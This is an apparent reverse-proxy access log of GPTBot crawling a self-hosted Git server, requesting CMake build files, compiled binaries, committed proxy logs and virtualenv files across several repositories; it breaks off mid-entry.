[Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43109] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21750] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:15:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21748] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:15:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21749] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:15:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:15:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:15:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:15:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:15:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:15:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:15:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33648] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10809] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10809] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 30953] [Gzip 16.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:15:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 10143] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:15:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 16336] [Gzip 6.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:15:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 15924] [Gzip 10.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:15:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 117479] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:15:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9963] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43084] [Gzip 19.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 21628] [Gzip 11.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:15:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 14956] [Gzip 8.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:15:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 42629] [Gzip 12.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:15:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 22665] [Gzip 10.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:15:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 95648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:15:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 20745] [Gzip 9.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:15:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 43288] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:15:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 23859] [Gzip 9.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:15:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 38982] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:15:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:15:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:15:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/projects?q=&sort=recentupdate&state=open" [Client 74.7.227.38] [Length 7812] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/projects" -[17/Feb/2026:15:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 54915] [Gzip 18.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:15:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 10144] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:15:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 277998] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:15:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main" [Client 74.7.227.38] [Length 